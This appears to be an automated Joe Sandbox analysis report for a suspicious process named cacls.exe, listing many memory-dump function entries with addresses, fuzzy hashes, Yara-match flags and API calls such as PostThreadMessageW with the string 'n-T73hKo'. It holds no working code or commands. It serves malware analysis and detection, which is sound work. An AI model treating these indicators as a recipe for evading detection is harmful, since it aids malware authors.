Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
Instruction ID: 1b79f5e2aa4953fd8bf6e7ae066b1a2626997d7e11f476d25ea49d14c7e7f42d
Opcode Fuzzy Hash: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
Instruction Fuzzy Hash: 8890023170580423A144B15848C4546400597E0301B55C021F4424564C8B548A565762

Function 03744650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0374465A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
Instruction ID: 4469632f491d627de23bc249e1bc536b63e926860d869bede31f9c029e97a181
Opcode Fuzzy Hash: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
Instruction Fuzzy Hash: 36900471701504535144F15C4C444077005D7F13013D5C135F4554570CC75CCD55D77F

Function 03742B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742B6A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
Instruction ID: 60ea888740c0ac132ac7585716b504dcb066e72d5ee185392eb3da3fdd0c569e
Opcode Fuzzy Hash: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
Instruction Fuzzy Hash: A5900261302404135109B1584454616400A87E0201B55C031F50145A0DC66589916526

Function 03742BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742BFA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
Instruction ID: e7ac824455472fcb2648fd65a0fc5cf09163cbc8742c1dd69a88660906729898
Opcode Fuzzy Hash: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
Instruction Fuzzy Hash: 9490023130140C13E184B158444464A000587D1301F95C025B4025664DCB558B597BA2

Function 03742BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742BEA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
Instruction ID: 367b578c83d11ff82864731835a43d7ac316ebaece229524dd0fbf62885007f6
Opcode Fuzzy Hash: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
Instruction Fuzzy Hash: 0290023130544C53E144B1584444A46001587D0305F55C021B40646A4D97658E55BA62

Function 03742BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742BAA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
Instruction ID: f9e7849ed393ff34608249ed0898b727af17facac6e8e6eecf79aae3df960e9a
Opcode Fuzzy Hash: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
Instruction Fuzzy Hash: CC90023170540C13E154B1584454746000587D0301F55C021B4024664D87958B557AA2

Function 03742AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742AFA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
Instruction ID: f88a32e1e05be0b344048598a3dcdc439c1a8eb45f29f5f71f1aa1933d3792d4
Opcode Fuzzy Hash: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
Instruction Fuzzy Hash: 76900225321404131149F558064450B044597D6351395C025F54165A0CC76189655722

Function 03742AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742ADA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
Instruction ID: 2cccec519a5300d7a3fe56dec07a4c4f11266dd4e83636c411b1e04f20706f31
Opcode Fuzzy Hash: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
Instruction Fuzzy Hash: 5090043531140413110DF55C07445070047C7D5351355C031F5015570CD771CD715533

Function 03742F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742F3A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
Instruction ID: 0a7109f5c6885c6e94475ce2dd10386ae8ca9bd18bfe56b73ced346a65d945e6
Opcode Fuzzy Hash: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
Instruction Fuzzy Hash: 9990026134140853E104B1584454B060005C7E1301F55C025F5064564D8759CD526527

Function 03742FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742FEA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ef8c22b364c6ce88b45917ada709c7726bf03a76c881fc0b8f52755abe38588
Instruction ID: ed17ef8d114a2ac682b2e8bb2cbd86bf244081fdc839d4d671c31df45b2dd39f
Opcode Fuzzy Hash: 4ef8c22b364c6ce88b45917ada709c7726bf03a76c881fc0b8f52755abe38588
Instruction Fuzzy Hash: 46900221311C0453E204B5684C54B07000587D0303F55C125B4154564CCA5589615922

Function 03742FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742FBA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c38fd1391ad418495a503be88d4cf5325eca80dd14b17ee3268d155653b6ea8
Instruction ID: 82de35a5688ade436deda1f024ed346640533ba554669716afbf811f2549769c
Opcode Fuzzy Hash: 0c38fd1391ad418495a503be88d4cf5325eca80dd14b17ee3268d155653b6ea8
Instruction Fuzzy Hash: B2900221701404535144B16888849064005ABE1211755C131B4998560D869989655A66

Function 03742EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742EEA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33775dbaa9b1fddb1abb903cb5cc80f9084cfd74be5183775174d911811a6139
Instruction ID: e4f3269c9882d05c0dca1a84e1d64d39a9e3befa5e4e3f058ffb13e8f4bccd94
Opcode Fuzzy Hash: 33775dbaa9b1fddb1abb903cb5cc80f9084cfd74be5183775174d911811a6139
Instruction Fuzzy Hash: 7590026130180813E144B5584844607000587D0302F55C021B6064565E8B698D516536

Function 03742E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742E8A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8193b887bffc8974b3bbc99d6baa727f4842913952573479bc7d1ea76d0114ae
Instruction ID: ee5ad104a3aa877696cae179d13bed022153492570b4bf0934a6ac22913c6d60
Opcode Fuzzy Hash: 8193b887bffc8974b3bbc99d6baa727f4842913952573479bc7d1ea76d0114ae
Instruction Fuzzy Hash: 1690022170140913E105B1584444616000A87D0241F95C032B5024565ECB658A92A532

Function 03742D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742D3A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df1f7c3a7bd84d15e3f03e5f0aedd9f6412d1dc776c5311fea1fc7e0c9ab7fcf
Instruction ID: 2caebc2c5e2e7a29464fc21f0570ce1a481762950574945a7b495fa3279c2172
Opcode Fuzzy Hash: df1f7c3a7bd84d15e3f03e5f0aedd9f6412d1dc776c5311fea1fc7e0c9ab7fcf
Instruction Fuzzy Hash: 9690022130140413E144B15854586064005D7E1301F55D021F4414564CDA5589565623

Function 03742D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742D1A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b01dcf9b9bf621418dc5fe1e072eba037e2e1deae6e98458a1a0c18f44c3be3f
Instruction ID: 8249bce200c229e3c21f4b4e2b59b83fda8b93b60cc59ed1513ff051e22c04ad
Opcode Fuzzy Hash: b01dcf9b9bf621418dc5fe1e072eba037e2e1deae6e98458a1a0c18f44c3be3f
Instruction Fuzzy Hash: 6A90022931340413E184B158544860A000587D1202F95D425B4015568CCA5589695722

Function 03742DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742DFA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2cb3757be789e9fd6db6a9edde48e178bf17146ae62d60c5d9bc3ad8fe9bef20
Instruction ID: f8265ad31c03cba8f65e491222151c8f3cfc692df3e59a3823f5787e2a00a8f4
Opcode Fuzzy Hash: 2cb3757be789e9fd6db6a9edde48e178bf17146ae62d60c5d9bc3ad8fe9bef20
Instruction Fuzzy Hash: 2990023130140823E115B1584544707000987D0241F95C422B4424568D97968A52A522

Function 03742DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742DDA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f6c214c9d5ab2a504eaebe5c77b83508531dc150419db1fae236da2577b5d69
Instruction ID: 644b5c1b9306302118310ae73866ff0136e1d69226ac8c629e995e30738597f1
Opcode Fuzzy Hash: 8f6c214c9d5ab2a504eaebe5c77b83508531dc150419db1fae236da2577b5d69
Instruction Fuzzy Hash: 25900221342445636549F1584444507400697E0241795C022B5414960C86669956DA22

Function 03742C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742C7A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc9cc39abed6bf4311022f7f2e964720848a8f5fe1378d3360ded98dd842524e
Instruction ID: 463c3bbfd9a1db0fe93e34029c9ba3167f41ebdbfd7957ee8432fb00afd5b7f0
Opcode Fuzzy Hash: bc9cc39abed6bf4311022f7f2e964720848a8f5fe1378d3360ded98dd842524e
Instruction Fuzzy Hash: DB90023130148C13E114B158844474A000587D0301F59C421B8424668D87D589917522

Function 03742C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742C6A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05b5f12371882245613a980449bbc25aed4d8f3ae25a34037b9aad100e081335
Instruction ID: 0adfa6b7e9b9016ae5168c586607f8fc232c314d2d2e3d131db158e7f2ddcbad
Opcode Fuzzy Hash: 05b5f12371882245613a980449bbc25aed4d8f3ae25a34037b9aad100e081335
Instruction Fuzzy Hash: 5D90023130140C53E104B1584444B46000587E0301F55C026B4124664D8755C9517922

Function 03742CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742CAA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb87cc024702eb7c533c63314af515885b0542d4e15c2ecd0450a10fe2725023
Instruction ID: 23fe22ae9ff1a5d4d9e4013e66e1e6e2d49ddafb0204a2a39cb98f7562ffe00b
Opcode Fuzzy Hash: cb87cc024702eb7c533c63314af515885b0542d4e15c2ecd0450a10fe2725023
Instruction Fuzzy Hash: 1490023130140813E104B5985448646000587E0301F55D021B9024565EC7A589916532

Function 037435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037435CA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f6479937f5bcad5edf79d6e4c4b6132c4b00139394cf0c0ac16e4fe8f0d6a79
Instruction ID: 484ffaed10dbcd0a8197fbd43116bbe1b5a7c3d0d40d5f74f88bd4d08c899746
Opcode Fuzzy Hash: 6f6479937f5bcad5edf79d6e4c4b6132c4b00139394cf0c0ac16e4fe8f0d6a79
Instruction Fuzzy Hash: 4790023170550813E104B1584554706100587D0201F65C421B4424578D87D58A5169A3

Function 037439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037439BA

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e71c7305a86aa1e0622af269822eda600545c027df9c3d475da7d9c72bb44788
Instruction ID: 34628bb92eb928a2e42be9a1f1ab94300b3b25c251cfa45614fbf3be7569ac5e
Opcode Fuzzy Hash: e71c7305a86aa1e0622af269822eda600545c027df9c3d475da7d9c72bb44788
Instruction Fuzzy Hash: 8F90022134545513E154B15C44446164005A7E0201F55C031B48145A4D869589556622

Function 02DA0CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 02DA0D77

Strings

n-T73hKo, xrefs: 02DA0D6C, 02DA0D76, 02DA0D87
n-T73hKo, xrefs: 02DA0D7E, 02DA0D81

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: a0c7e4ba102f63f848a89b848deacd33e87e2b1b4d1325ffdf09208f0ea8d785
Instruction ID: af41ac8835a83ad75d3ba710b1c56e7ca16017dc12fcfbbeb4daccff5bfd9dfc
Opcode Fuzzy Hash: a0c7e4ba102f63f848a89b848deacd33e87e2b1b4d1325ffdf09208f0ea8d785
Instruction Fuzzy Hash: B101A1B2D0024CBEEB11AAE48C91EEF7B7CEF41694F058465F904BB200D6755E068BB1

Function 02DA0D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 02DA0D77

Strings

n-T73hKo, xrefs: 02DA0D6C, 02DA0D76, 02DA0D87
n-T73hKo, xrefs: 02DA0D7E, 02DA0D81

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: be5c09e5b0ef5fbecdfb1fe21b244c6b498759ef44a0144cce69ea979bb41a07
Instruction ID: 27a8e38ac49ab136c74b1813513f3f9beb9143711bbe33b8e2d85adffbc573c7
Opcode Fuzzy Hash: be5c09e5b0ef5fbecdfb1fe21b244c6b498759ef44a0144cce69ea979bb41a07
Instruction Fuzzy Hash: 820180B2D0025CBEEB11AAE49C91EEF7B7CEF41694F058065FA04B7240D6795E068BB1

Function 02DA0CC8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 02DA0D77

Strings

n-T73hKo, xrefs: 02DA0D6C, 02DA0D76, 02DA0D87
n-T73hKo, xrefs: 02DA0D7E, 02DA0D81

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: 92bd6b818e77d4d2e90042689efe5e0378ae6e89a2d67a067263c41281a653b9
Instruction ID: ea36641c08b11ffa49403c9f446c83438b38e1af4a7c8ec2bbac3740df289053
Opcode Fuzzy Hash: 92bd6b818e77d4d2e90042689efe5e0378ae6e89a2d67a067263c41281a653b9
